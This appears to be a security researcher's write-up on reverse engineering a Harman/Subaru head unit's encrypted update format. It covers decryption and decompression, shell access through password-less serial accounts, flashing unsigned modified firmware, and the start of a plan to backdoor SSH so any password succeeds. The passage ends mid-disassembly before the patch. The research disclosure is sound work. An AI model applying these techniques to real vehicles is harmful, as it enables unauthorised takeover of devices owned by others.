LOAD:0804AAAA BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAAC 1B 89 LDRH R3, [R3,#8] LOAD:0804AAAE 4D F2 5C 10+ MOV R0, #aVersion0x04hx ; " Version: 0x%04hx\n" LOAD:0804AAB6 19 46 MOV R1, R3 LOAD:0804AAB8 FF F7 30 E9 BLX printf LOAD:0804AABC BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AABE 5B 89 LDRH R3, [R3,#0xA] LOAD:0804AAC0 4D F2 80 10+ MOV R0, #aFsType0x04hx ; " FS type: 0x%04hx\n" LOAD:0804AAC8 19 46 MOV R1, R3 LOAD:0804AACA FF F7 28 E9 BLX printf LOAD:0804AACE BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAD0 DB 68 LDR R3, [R3,#0xC] LOAD:0804AAD2 4D F2 A4 10+ MOV R0, #aFlags0x08x ; " Flags: 0x%08x\n" R3 points to the DAT file contents. Before each print, a constant is added to the DAT file content pointer then the value is dereferenced. In effect, each load shows us the correct offset to the field being printed. Thus, signature is offset 0 (the QNXCNDFS string, not a digital signature one might first suspect), version is offset 8, filesystem type is offset 0xA, etc. Using this subroutine, we can recover around 70-80% of the header data for the encrypted file with virtually no effort. Since we don't know what FS type actually means or corresponds to, these aren't the best fields to verify. If we go down a bit in the function, we get to more interesting header fields with sizes. 
LOAD:0804AB38 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB3A D3 E9 04 23 LDRD.W R2, R3, [R3,#0x10] LOAD:0804AB3E 4D F2 10 20+ MOV R0, #aRawSizeLluByte ; " Raw size: %llu bytes\n" LOAD:0804AB46 FF F7 EA E8 BLX printf LOAD:0804AB4A BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB4C D3 E9 06 23 LDRD.W R2, R3, [R3,#0x18] LOAD:0804AB50 4D F2 38 20+ MOV R0, #aCondensedSizeL ; " Condensed size: %llu bytes\n" LOAD:0804AB58 FF F7 E0 E8 BLX printf LOAD:0804AB5C BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB5E D3 E9 08 23 LDRD.W R2, R3, [R3,#0x20] LOAD:0804AB62 4D F2 60 20+ MOV R0, #aRawDataBytesLl ; " Raw data bytes: %llu bytes\n" LOAD:0804AB6A FF F7 D8 E8 BLX printf Condensed size is a double-word (64-bit value) loaded at offset 0x18. This corresponds to this word in our header: 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 8c 1d 5e 05 00 00 00 00 is little endian for 90054028 bytes, which is the exact size of swupdate.dat. This is confirmation that we're on the right track with the header. The header contains several configurable hashes. There's a hash for the metadata, a hash for an "extents" and "cluster" table, and finally a hash for the actual encrypted data. The hash bounds can be reverse engineered by simply guessing else looking a bit further in the binary. The cdqnx6fs binary is quite compact and doesn't contain many debugging strings. Reverse engineering it will be time consuming, so attempting to guess at the file-format instead of reverse engineering large amounts of filesystem IO code could save time. Cluster Table The cluster table contains a header-configurable number of clusters. I didn't know what clusters were at this point, but an initial guess is something akin to a filesystem block. The header also contains an offset to a table of clusters. The table of clusters looks like this: 00000280 90 0e 00 00 00 00 00 00 e1 e6 00 00 00 00 00 00 |................| 00000290 71 f5 00 00 00 00 00 00 19 1c 00 00 00 00 00 00 |q...............| 000002a0 8a 11 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |................| 000002b0 a3 2d 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |.-..............| Again, we can easily guess what this is with a little intuition. If we assume the first doubleword is a pointer in the existing file and navigate to offset 0x0E90, we get: 00000e50 80 f3 42 05 00 00 00 00 5f 89 07 00 00 00 00 00 |..B....._.......| 00000e60 df 7c 4a 05 00 00 00 00 96 fd 08 00 00 00 00 00 |.|J.............| 00000e70 75 7a 53 05 00 00 00 00 2c 21 06 00 00 00 00 00 |uzS.....,!......| 00000e80 a1 9b 59 05 00 00 00 00 eb 81 04 00 00 00 00 00 |..Y.............| 00000e90 0e 0f 86 ac 0a e5 9c 25 ce 6d 09 ee 9c 58 39 9a |.......%.m...X9.| 00000ea0 97 84 6f 26 5c 8b 03 c2 bf b6 c8 80 11 69 34 10 |..o&\........i4.| 00000eb0 c1 0c 02 5c 01 fa f8 fa 10 65 c2 d3 3b 49 82 14 |...\.....e..;I..| 00000ec0 d6 3c ef ce db 52 5b 11 42 69 6e c3 50 a2 1f af |.<...R[.Bin.P...| 0xe90 is the end of the cluster table (note the change in entropy). The first doubleword is almost certainly an offset into the data section. For the next doubleword, a guess is that it is the size of the cluster data. 0x0e90 + 0xE6E1 = 0xF571. The next cluster entry offset is indeed 0xF571. We now understand the cluster table and the data section. Cluster Data Chunks of cluster data can now be extracted from the data segment using the cluster table. Each chunk looks entirely random and there is no clear metadata in any particular chunk. 
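Turning those guesses into code makes them easy to test. A small sketch that walks the cluster table of swupdate.dat, treating each entry as a pair of little-endian 64-bit values (absolute file offset, condensed length); the table offset is taken by eye from the hexdump above, and the entry count is a guess at one of the header dwords:

# Sketch of the guessed cluster-table layout: entries are two little-endian u64s,
# (absolute file offset, condensed length). Offsets/counts below are hand-picked.
import struct

CLUSTER_TABLE_OFFSET = 0x280  # where the table dump above starts
CLUSTER_COUNT = 0xC1          # assumption: a header dword that looks like a count

def read_clusters(path):
    with open(path, "rb") as f:
        f.seek(CLUSTER_TABLE_OFFSET)
        table = [struct.unpack("<QQ", f.read(16)) for _ in range(CLUSTER_COUNT)]
        clusters = []
        for offset, length in table:
            f.seek(offset)
            clusters.append(f.read(length))
    return table, clusters

table, clusters = read_clusters("swupdate.dat")
print(hex(table[0][0]), hex(table[0][1]))  # expect 0xe90 and 0xe6e1 per the dump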
Using header data, we know that both dat files shipped in this update are both encrypted and compressed. The decryption step will need to happen first using AES256-GCM. Via reverse engineering and searching for strings near the encryption code, it is clear that the cdqnx6fs binary is using mbed tls. The target decryption function is mbedtls_gcm_auth_decrypt . After researching GCM a bit more, we will need the symmetric key, the initialization vector, and an authentication tag to correctly decrypt and verify the buffer. We have a probable symmetric key from the filesystem, but need to find the IV and tag. Again, the code is dense and reverse-engineering the true structure would take quite a bit of time, and I didn't find evidence of a constant IV, so let's guess. If I were designing this, I'd put the IV in the first 16 bytes, the tag in the next 16, then have the encrypted data following that. There aren't too many logical combinations here, so we can switch the IV and tag around, and also try prepending and appending this data. This seemed likely to me. Unfortunately, after plugging in the symmetric key and trying the above process in python, nothing seemed to decrypt correctly. The authentication tags never matched. Thus, we potentially guessed incorrectly on the structure of the encrypted clusters, the algorithm isn't actually AES-GCM (or it was modified), or something else is going on. Before delving into the code, let's search for where the encryption key is passed from installUpdate to cdqnx6fs. The symm.key file seems like an obvious choice for the symmetric key, but maybe that isn't correct. Decrypting How do we locate where the symmetric key is loaded and passed to the new process? Search for the filename and examine all references. There is only one reference, and it is passed to fopen64. A short while after, this value is passed to the cdqnx6fs process. Examine the following code: LOAD:08052ADE 37 48 LDR R0, =aDecrypting ; "Decrypting..." LOAD:08052AE0 FE F7 74 EE BLX puts LOAD:08052AE4 36 4B LDR R3, loc_8052BC0 LOAD:08052AE6 37 49 LDR R1, =(aR+1) ; "r" LOAD:08052AE8 18 68 LDR R0, [R3] ; "/etc/keys/symm.key" LOAD:08052AEA FE F7 68 EA BLX fopen64 LOAD:08052AEE 05 46 MOV R5, R0 LOAD:08052AF0 48 B9 CBNZ R0, loc_8052B06 LOAD:08052AF2 35 4B LDR R3, =(a89abcdefcalcne+8) ; "calcNewSymmKey" LOAD:08052AF4 02 21 MOVS R1, #2 LOAD:08052AF6 0A 46 MOV R2, R1 LOAD:08052AF8 00 93 STR R3, [SP,#0xC0+var_C0] LOAD:08052AFA 32 23 MOVS R3, #0x32 LOAD:08052AFC 01 93 STR R3, [SP,#0xC0+var_BC] LOAD:08052AFE 33 4B LDR R3, =aUnableToOpenSy ; " Unable to open symm key file : %s , %d"... LOAD:08052B00 FE F7 FE EC BLX slog2f LOAD:08052B04 1E E0 B return_err A major hint is the debug error message that happens to print the function name. The function the symmetric key gets loaded in is called calcNewSymmKey, and another debug message prints "Decrypting...". The symmetric key is modified via some form of transformation. Key Generation Back before every app was built with Electron and used around three gigs of RAM to send a tweet, software authors would distribute demos and shareware, which was software that usually had the complete functionality unlocked for a brief time-trial. To unlock it, you would pay the author and get back a code (serial) you could enter into the program. This serial was often tied to hardware specific information or a user-name. If the serial was valid, the program would unlock. There are numerous different ways to get around this. 
In order of what the "scene" considered most technically impressive and useful back in the day, the best way to bypass software serial schemes was as follows: Key Generator - Reverse engineer the author's serial registration algorithm. Port it to C or well documented, ASM, write a nifty win32 applet that plays mod files and makes your logo spin around, etc. Self-key generation - Modify the binary to print out the real serial number in a text box. Many programs would make the fatal mistake of comparing the true serial with the one the user entered via strcmp. Just change the comparison to a message box display function and exit right after as you probably overwrote some important code. After you get the code, delete the patched version, install the original, and you have an "authentically" registered program. Patching - Bypass the time-limit, always return "Registered", etc. The more patches it took, usually the worse the "crack" was. Reverse engineering the key generation algorithm was always the hardest method. Patching was challenging as it was a cat and mouse game between developers and crackers. Registration functionality would get increasingly complicated to try and obfuscate what was going on. Harman has designed an encryption scheme that is quite similar to early software protection efforts. Emulation Harman's algorithm looks rather simple as the function generating the new key doesn't call into any subroutines, doesn't use any system calls, and is only 120 lines of ARM. The ARM is interesting to look at, but at the end of the day one can statically analyze the entire process without ever leaving the subroutine. But understanding the assembly and converting it to C will take time. What if we could just emulate the algorithm? We're running ARM. The easiest way will be to take the actual assembly and paste it directly into an assembly stub, then call into that from C. After it returns, print the modified memory contents. Cross-compile it, run in QEMU, and done. The idea is to take the Harman transformation code and run it exactly. This isn't quite as easy as copy-and-paste, but it is close. I had to modify a few registers to get this to work. The assembly stub: .syntax unified .section .text .global decrypt .cpu cortex-a9 .thumb decrypt: push {r4-r7, lr} # Code goes here! pop {r4-r7, pc} The C shim: #include <stdio.h> extern char *decrypt(char *, int); #define SALT 0x0 int main() { char symmetric_key[] = "key-was-here"; char *output = decrypt(symmetric_key, SALT); printf("Key is: %s\n", output); return 0; } The Makefile: all: arm-linux-gnueabi-gcc -Wall -pedantic key.c -g algo.s -static -mthumb && qemu-arm -cpu cortex-a9 a.out clean: rm a.out The only other trick to note is that the calcNewSymmKey function takes in one parameter called a salt. Salt is loaded from the very end of the standard ISO header (0x7FDE) and is also printed in some of the build artifacts that are still packaged with the updates. 00007fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 |..............09| 00007fe0 a9 2b 74 10 51 6b 01 46 5b 1a e3 40 dc d1 ec d5 |.+t.Qk.F[..@....| 00007ff0 36 a4 53 0c 23 05 bd 76 ac 60 83 f0 7b 88 79 c5 |6.S.#..v.`..{.y.| 00008000 01 43 44 30 30 31 01 00 57 69 6e 33 32 2f 4d 69 |.CD001..Win32/Mi| The salt fetching code simply converts a two-digit ASCII character array into an integer. 
salt = 10 * DIGIT1 + DIGIT2 - 0x210; Which is just an expanded version of the "convert a two-digit character array representing an integer number to an integer" algorithm: salt = 10(DIGIT1 - 0x30) + (DIGIT2 - 0x30) After running the key generator with the correct salt, we get a significantly modified symmetric key that decrypts the clusters. Easy as that! I believe the true key generation algorithm can be derived by playing around with the symmetric key and the salt value with the key generator. It appears to be a simple rotation cipher. I will not release the full key generator as it is using Harman's own code. On the plus side, this should cut down on "I flashed a random binary to my head unit and it won't turn on" support e-mails. Cluster Decryption With the new key, the aforementioned guessed decryption scheme works. IV is indeed the first chunk, followed by the authentication tag, followed by the encrypted data. 00000000 04 eb 10 90 00 60 00 01 10 43 00 18 d8 6f 17 00 |.....`...C...o..| 00000010 00 80 fa 31 c0 8e d0 bc 00 20 b8 c0 07 50 b8 36 |...1..... ...P.6| 00000020 01 50 cb 00 2b 81 00 66 90 e9 00 02 8d b4 b7 01 |.P..+..f........| 00000030 39 81 00 ff ff 04 00 93 27 08 00 3d 01 00 04 18 |9.......'..=....| 00000040 00 90 7c 26 b8 00 9b cf d7 01 19 cf 00 0d 0a 51 |..|&...........Q| 00000050 4e 58 20 76 31 2e 32 62 20 42 6f 6f 74 20 4c 6f |NX v1.2b Boot Lo| 00000060 61 64 65 72 57 00 10 55 6e 73 75 70 70 6f 72 74 |aderW..Unsupport| 00000070 65 64 20 42 49 4f 53 52 00 08 52 41 4d 20 45 72 |ed BIOSR..RAM Er| 00000080 72 6f 7e 00 09 44 69 73 6b 20 52 65 61 64 26 12 |ro~..Disk Read&.| 00000090 00 10 4d 69 73 73 69 6e 67 20 4f 53 20 49 6d 61 |..Missing OS Ima| 000000a0 67 65 52 00 07 49 6e 76 61 6c 69 64 29 13 00 29 |geR..Invalid)..)| 000000b0 17 01 06 4d 75 6c 74 69 2d 76 03 03 00 3a 20 5b |...Multi-v...: [| 0x9010eb04 is the tag for a QNX6 filesystem. Some of the strings look slightly corrupted, which is probably explained by the compression. Cluster Decompression If we go back to the binary and look for a hint, we find a great one: LOAD:0805D6D8 41 73 73 65+aAssertionFaile DCB "Assertion failed in %s@%d:e == LZO_E_OK",0 This points us, with almost absolute certainty, to lzo. Take the chunk, pass it to lzo1x_decompress_safe() via C or Python, then get the following error message: lzo.error: Compressed data violation -6 So, this isn't miniLZO? This part stumped me for a few hours as lzo1x is by far the most commonly used compression function used from the LZO library. The LZO library does provide many other options that are benchmarked in the LZO documentation — i.e., there's also LZO1, LZO1A, LZO1B, LZO1C, LZO1F, LZO1Y, etc. lzo1x is packaged inside of miniLZO, and is recommended as the best, hence seems to be almost the only algorithm ever used as far as I am aware. From the LZO documentation: My experiments have shown that LZO1B is good with a large blocksize or with very redundant data, LZO1F is good with a small blocksize or with binary data and that LZO1X is often the best choice of all. LZO1Y and LZO1Z are almost identical to LZO1X - they can achieve a better compression ratio on some files. Beware, your mileage may vary. I tested most of the algorithms, and only one worked: lzo1c_decompress_safe. So, why was lzo1c used? I have absolutely no idea. My guess is someone was bored one day and benchmarked several of the lzo algorithms for QNXCNDFS, or someone thought this would make it difficult to recover the actual data. 
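Tying the last two steps together, a per-cluster pipeline looks roughly like the sketch below, assuming the guessed 16-byte IV / 16-byte tag split, a key that has already been run through the (unreleased) transformation, and some binding that exposes lzo1c, which the stock python-lzo module does not; that part is left as a clearly hypothetical placeholder.

# Hypothetical per-cluster pipeline: AES-256-GCM decrypt with the transformed key,
# then LZO1C decompression via a placeholder binding.
from Crypto.Cipher import AES  # pycryptodome

def decrypt_cluster(cluster, key):
    iv, tag, ciphertext = cluster[:16], cluster[16:32], cluster[32:]  # guessed split
    aes = AES.new(key, AES.MODE_GCM, nonce=iv)
    return aes.decrypt_and_verify(ciphertext, tag)  # raises ValueError on a bad tag

def decompress_cluster(blob, raw_block_size=64 * 1024):  # 64k default from cndfs help
    # Placeholder: stock python-lzo only wraps lzo1x; a patched build exposing
    # lzo1c_decompress_safe is needed here (see the qdecant note further down).
    import lzo1c  # hypothetical module name
    return lzo1c.decompress(blob, raw_block_size)

# usage sketch: key = transform(open("symm.key", "rb").read(), salt)  # transform not released
# plaintext = decompress_cluster(decrypt_cluster(clusters[0], key))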
This just makes decryption an annoyance as every upstream lzo package usually only implements the lzo1x algorithm. Mounting the Image After all of this, we can now decrypt and decompress all of the chunks. Concatenating the result of this gives us a binary blob that looks quite like a QNX6 filesystem. The Linux kernel can be built to mount QNX6 filesystem as read-only thanks to the work of Kai Bankett. However, if we try to mount the concatenated image, we get a superblock error. $ sudo mount -t qnx6 -o loop system.dat.dec.noextent mnt mount: /home/work/workspace/mnt: wrong fs type, bad option, bad superblock on /dev/loop7, missing codepage or helper program, or other error. The kernel module reports: [ 567.260015] qnx6: unable to read the second superblock On top of all of this, some of the header fields do not appear to match up with what we expect: raw size (dword header offset: 0x10) does not match the file size of our decrypted and decompressed blob. This almost certainly has to do with the previously ignored extents section of the QNXCNDFS file. The Extents Section Most of the QNXCNDFS file is now understood, with one exception: the extents section. 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| Low entropy again, so we can try guessing. We know the size and start of the extents section from the header. We know there are four "extents" (again from the header), hence the above is almost certainly four sets of four dwords. Searching the binary for useful strings isn't too productive. Two fields are named, but no other hints: LOAD:0805DD8C 41 73 73 65+aAssertionFaile_1 DCB "Assertion failed in %s@%d:cpos == xtnt->clstr0_pos",0 ... LOAD:0805DE2C 41 73 73 65+aAssertionFaile_2 DCB "Assertion failed in %s@%d:offset == xtnt->clstr0_off",0 So, one field may be a cluster position, the other may be some form of cluster offset. There seem to be some patterns in the data. If we assume the first dword is an address and the second dword is a length, the results look good. Extent at 0x200: Write Address: 0x00000000, Write Size: 0x00002000 Extent at 0x220: Write Address: 0x00002000, Write Size: 0x00000200 Extent at 0x240: Write Address: 0x00003000, Write Size: 0x0C078000 Extent at 0x260: Write Address: 0x3FFFB000, Write Size: 0x00000200 Adding up the write sizes gives us 0xC07A400, which matches the header field for "raw data bytes" of the file. These don't line up perfectly. The first and second extent makes sense — write address 0 + write size 0 = write address 1. What do the third and fourth dword represent? Clusters are likely involved, in fact, the third dword does point to offsets that line up with cluster table entries. Dword four is a bit mysterious. To solve this, understanding the QNX6 superblock structure is helpful. Understanding the Extents There's a well written write-up of the QNX6 filesystem structure done by the same individual that implemented the driver in the Linux kernel. 
Summarizing the useful parts, there are two superblocks in the filesystem images. One is near the beginning and one is near the end. Debugging the kernel module indicates that the first superblock is correct and validating, while the second is missing or invalid. Manually calculating the second superblock address via following the source code gets us this: //Blocksize is 1024 (0x400) //num_blocks = 0xFFFE0 //bootblock offset = #define QNX6_BOOTBLOCK_SIZE 0x2000 #define QNX6_SUPERBLOCK_AREA 0x1000 /* calculate second superblock blocknumber */ offset = fs32_to_cpu(sbi, sb1->sb_num_blocks) + (bootblock_offset >> s->s_blocksize_bits) + (QNX6_SUPERBLOCK_AREA >> s->s_blocksize_bits); So: 0xFFFE0 + (0x2000 >> 10) + (0x1000 >> 10) * 1024 block size is offset: (0xFFFE0 + 8 + 4) * 1024 = 0x3FFFB000 Note that the calculated second superblock address is the same as the last extent write address. At this point, it became clear to me that the extents section is just used to "compress" large runs of zeros. The last extent is skipping a large chunk of memory and then writing out the superblock from the end of the last cluster. Thus, we can process the extents like this: aa aa aa aa 00 00 00 00 bb bb bb bb 00 00 00 00 cc cc cc cc 00 00 00 00 dd dd dd dd 00 00 00 00 At offset 0xaaaaaaaa, write 0xbbbbbbbb bytes from offset 0xdddddddd into the cluster pointed to by cluster table entry 0xcccccccc. Or, a real example: 00000200 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000210 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000220 00 20 00 00 00 00 00 00 00 02 00 00 00 00 00 00 |. ..............| 00000230 80 02 00 00 00 00 00 00 00 20 00 00 00 00 00 00 |......... ......| 00000240 00 30 00 00 00 00 00 00 00 80 07 0c 00 00 00 00 |.0..............| 00000250 80 02 00 00 00 00 00 00 00 22 00 00 00 00 00 00 |........."......| 00000260 00 b0 ff 3f 00 00 00 00 00 02 00 00 00 00 00 00 |...?............| 00000270 80 0e 00 00 00 00 00 00 00 a2 07 00 00 00 00 00 |................| mmap a 0 set file of header field "raw size" bytes. At offset 0x00000000, write 0x00002000 bytes from an offset of 0x00000000 into the cluster pointed to by table entry 0x0280. At offset 0x00002000, write 0x00000200 bytes from an offset of 0x00002000 into the cluster pointed to by table entry 0x0280. At offset 0x00003000, write 0x0c078000 bytes from an offset of 0x00002200 into the cluster pointed to by table entry 0x0280. At offset 0x3fffb000, write 0x00000200 bytes from an offset of 0x07a20000 into the cluster pointed to by table entry 0x0e80. As the 0x0c078000 byte write runs off the end of first cluster, the correct behavior is to jump to the next cluster in the table and continue reading. This simplifies the extents section. Final Decompression With this, we know enough to completely decompress the encrypted and compressed QNXCNDFS files and successfully mount them through the Linux QNX6 driver. This was all done via static analysis. See qdecant for a rough implementation of this, but do note that you'll have to compile your own python lzo module with one function call change for this to work. This was a quick, and woefully inefficient, script to get the files dumped as soon as possible. I would have improved it further, but you'll see why I didn't subsequently. system.dat Here's a small sample of the files and directories inside of system.dat: ./bin ... ./bin/bt_test ./bin/iocupdate ./bin/awk ./bin/display_image ./bin/gles1-gears ./bin/screenshot ... ./lib ./lib/libQt53DLogic.so.5 ... 
./lib/libQt53DQuick.so.5 ./etc ./etc/resolv.conf ./etc/licenseAgreement.txt ./etc/openSourceLicenses.txt ./etc/options.connmgr ./app/usr/share/prompts/waveFiles/4CH ... ./app/usr/share/trace/UISpeechService.hbtc ./app/etc/wicome/DbVersion.txt ... ./app/etc/wicome/SCP.rnf ./app/etc/speech/AudioConfig.txt ./app/share/updatestrings.json ./app/wicome ./usr ./usr/var ./usr/var/DialogManager ./usr/var/DialogManager/DynamicUserDataGrammar ./usr/var/UISS ./usr/var/UISS/speechTEFiles/sat ./dialogManager/dialog/grammar/en_US/grammarHouseBackward.fcf ... ./ifs_images ./ifs_images/sys1.ifs ./ifs_images/core1.ifs ./ifs_images/hmi1.ifs ./ifs_images/second1.ifs ./ifs_images/third1.ifs Far less than I imagined. Plenty of duplicated files we already had access to from the ISO file. The interesting finds are the new ifs files at the bottom. ifs_images There are plenty more files in the system.dat ifs images. It is always fun to look around system internals. Here are a few interesting findings: tr.cpp - Some sort of build artifact. Has something to do with mapping fonts or translation strings to the UI, I believe. Hints at a dealer, factory, and engineering mode. I believe dealer and factory can be triggered with known button combinations. I am unsure how to get into engineering mode or what it even contains. "FACTORY_MODE"<<"DEALER_MODE"<<"ENGINEERING_MODE"; CarplayService.cfg - Apple apparently recommends that head units supporting Carplay not inject their own UI/functionality on top of or next to Carplay. Well done Apple and Subaru, that's always annoying. "Screen_Width": 800, /* March-02-2016: The Apple Spec recommended is slightly changed here as per discussion with Apple [during demo over webex] and they suggested the carplay screen to occupy full screen of HU removing the status bar [maserati icon]*/ Internal document - Found an older Microsoft Office document with what looks like company internal details (serial numbers) on various components. Mentions a number of cars in the Subaru lineup then a codename for some sort of new Subaru North American vehicle. This is from 2016, so I'd guess that vehicle has already been announced by now. On the bright side, it didn't look very sensitive. Overall, there was lots of stuff, but no obvious code execution mechanisms found in the brief search. I was hoping for a script that loaded code from the USB drives, some form of debugging mode with peek/poke, or anything useful. There are enough files here that I could probably keep exploring and find an avenue, but let's revisit the serial port for now. Back to QNXCNDFS Most of the QNXCNDFS structure is understood. Nowhere during the reverse engineering process did I find any signatures, signature verification code, or strings indicating some form of signature check taking place. However, being able to prove that there isn't a signature check is difficult through reverse engineering alone. The easiest way to prove this would be to generate our own custom QNXCNDFS image, overwrite one in the update file, and try to flash it down. If it works, great; if not, we'll probably get a new error message that will point us to another signature check we missed. As we understand the file structure, we could work backwards and create a tool to compress a QNX6 filesystem image into a QNXCNDFS file.
But we also know that the cndfs application looks to support creating QNXCNDFS files, so if we already had code execution, we could just use that tool to create our images and skip the time-consuming step of trying to generate valid QNXCNDFS files from scratch. Both are viable options, but let's look for more flaws first.

The Shadow File
Here's the shadow file with the hashes replaced.
root:@S@aaaaa@56c26c380d39ce15:1042473811:0:0
logger:@S@bbbbb@607cb4704d35c71b:1420070987:0:0
certifier:@S@ccccc@e0a3f6794d650876:1420137227:0:0
Three passwords I failed to crack. Here's passwd:
root:x:0:0:Superuser:/:/bin/sh
daemon::1:2:daemon:/:
dm::2:8:dwnmgr:/:
Some important notes about passwd, from the QNX manual:
If the has_passwd field contains an x character, a password has been defined for this user. If no character is present, no password has been defined.
and
The initial_command field contains the initial command to run after the user has successfully logged in. This command and any arguments it takes must be separated by tab or space characters. As the command is spawned directly (not run by a shell), no shell expansions is performed. There is no mechanism for specifying command-line arguments that contain space or tab characters themselves. (Quoting isn't supported.) If no initial_command is specified, /bin/sh is used.
So, we can potentially log in over serial as daemon and dm. They have no password defined and no initial command specified, which implies /bin/sh will be the command. Does this work?

Non-privileged Code Execution
Absolutely.
$ ls
sh: ls: cannot execute - No such file or directory
$ echo $PATH
:/proc/boot:/bin:/usr/sbin:/fs/core1/core1/bin:/fs/sys1/sys1/bin:/fs/core/hmi:/fs/second1/second1/bin:/fs/third1/third1/bin:/sbin:/fs/system/bin
$ cd /fs/system/bin
$ echo *
HBFileUpload NmeCmdLine antiReadDisturbService awk bt_test cat cdqnx6fs changeIOC chkdosfs chkfsys chkqnx6fs chmod cp cypress_ctrl date dbus-send dbustracemonitor dd devb-umass devc-serusb display_image emmcvuc fdisk fs-cifs fsysinfo gles1-gears grep hd hmiHardControlReceiver hogs inetd inject iocupdate isodigest ls mediaOneTestCLI mkdir mkdosfs mkqnx6fs mtouch_inject mv netstat pcm_logger pfctl pidin ping pppd qdbc rm screenshot showmem slog2info softwareUpdate sshd sync telematicsService telnetd testTimeshift top tracelogger ulink_ctrl use watchdog-server which
$ ./cdqnx6fs
sh: ./cdqnx6fs: cannot execute - Permission denied
Unfortunately, nearly every binary is locked down to the root user. We can only navigate around via cd and dump directory contents with echo *. The good news is that when the system mounts a FAT32 USB drive, it marks every binary as 777. Thus, glob every binary we've extracted thus far into a folder on a flash drive, insert it into the head unit USB adapter, connect to dm or daemon via serial, set your $PATH to include the aforementioned folder, and then type ls.
$ ls -las / total 201952 1 lrwxrwxrwx 1 root root 28 Jan 01 00:02 HBpersistence -> /fs/data/app/usr/share/trace 1 drwxr-xr-x 2 root root 30 May 25 2017 bin 1 drwxr-xr-x 2 root root 10 May 25 2017 dev 1 drwxr-xr-x 2 root root 20 May 25 2017 etc 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 fs 1 dr-xr-x--- 2 root 73 10 Dec 31 1969 home 0 drwxrwxr-x 8 root root 0 Jan 01 00:01 pps 201944 dr-xr-xr-x 2 root root 103395328 Jan 01 00:02 proc 1 dr-xr-x--- 2 root upd 10 Dec 31 1969 sbin 0 dr-xr-xr-x 2 root root 0 Jan 01 00:02 srv 1 lrwxrwxrwx 1 root root 10 May 25 2017 tmp -> /dev/shmem 1 drwxr-xr-x 2 root root 10 May 25 2017 usr Local code execution via serial. We can now execute every binary that doesn't require any sort of enhanced privileges. cdqnx6fs is one of them. $ ./cdqnx6fs ---help cdqnx6fs - condense / restore Power-Safe (QNX6) file-systems cdqnx6fs -c [(general-option | condense-option)...] src dst cdqnx6fs -r [(general-option | restore-option)...] src dst I wish I could provide some sage advice on how I solved this but it just comes down to experience. Do it enough and patterns will emerge. Image Creation Assuming cdqnx6fs works, we can now extract the system.dat (using the -r flag), mount the extracted QNX6 image in a system that supports read/write operations, modify the image in some way, flash it back down, and see if it works. If the image truly isn't signed or the verification code is broken, the flashing step will succeed. To modify the QNX6 images, we can't use the Linux driver as that only supports reading. We'll have to use an official QNX 6 test VM for full QNX6 filesystem IO. Extract the image, mount the image, add a test file in a known directory, unmount the image, transfer it back to the Harman head unit, repackage it using the correct encryption key, replace the file into the update package, flash it down, pray. The install succeeds and we can find the new file via serial. The system effectively runs unsigned code and the only "protection" against this is what looks to be an easily reverse engineered cipher. Root Escalation We can now modify system files, but the next question is, what files should we modify for root code execution? Keep in mind that the shadow file and various SSH keys are in the IFS binary blobs. So, while the best root method may be replacing the root password, that would involve more reverse engineering. We don't know the IFS file structure, and at this point, diving into yet another binary blob black box format doesn't sound enjoyable. (Someone else do it.) There are a large number of files not in the IFS images, but none of them are shell scripts or any sort of obvious startup script we can modify. Our options are mostly all system binaries. There are an infinite number of ways to gain (network) code execution by replacing binaries, but I'll stick with what I thought of first. Let's backdoor SSH to always log us in even if the password is incorrect. Backdooring SSH You'd think this part would just be a web search away. Unfortunately, searching for "backdooring ssh" leads to some pretty useless parts of the Internet. Pull the source for the version of OpenSSH running on the system — it's 5.9 (check strings and you'll see OpenSSH_5.9 QNX_Secure_Shell-20120127). Browse around, try to understand the authentication process, and target a location for a patch. 
There were a few locations that looked good, but I started here in auth2-passwd.c: Here's userauth_passwd: static int userauth_passwd(Authctxt *authctxt) { char *password, *newpass; int authenticated = 0; int change; u_int len, newlen; change = packet_get_char(); password = packet_get_string(&len); if (change) { /* discard new password from packet */ newpass = packet_get_string(&newlen); memset(newpass, 0, newlen); xfree(newpass); } packet_check_eom(); if (change) logit("password change not supported"); else if (PRIVSEP(auth_password(authctxt, password)) == 1) authenticated = 1; memset(password, 0, len); xfree(password); return authenticated; } The patch should be straight forward. Instead of returning authenticated = 0 on failure, always return authenticated = 1. Find this location in the binary by matching strings: .text:080527E6 .text:080527E6 loc_80527E6 ; CODE XREF: sub_805279C+38↑j .text:080527E6 CBZ R6, loc_80527F2 .text:080527E8 LDR R0, =aPasswordChange_0 ; "password change not supported" .text:080527EA MOVS R5, #0 .text:080527EC BL sub_806CC94 .text:080527F0 B loc_805280E .text:080527F2 ; --------------------------------------------------------------------------- .text:080527F2 .text:080527F2 loc_80527F2 ; CODE XREF: sub_805279C:loc_80527E6↑j .text:080527F2 LDR R3, =dword_808A758 .text:080527F4 MOV R0, R5 .text:080527F6 MOV R1, R4 .text:080527F8 LDR R3, [R3] .text:080527FA CBZ R3, loc_8052802 .text:080527FC BL sub_8056A18 .text:08052800 B loc_8052806 .text:08052802 ; --------------------------------------------------------------------------- .text:08052802 .text:08052802 loc_8052802 ; CODE XREF: sub_805279C+5E↑j .text:08052802 BL sub_8050778 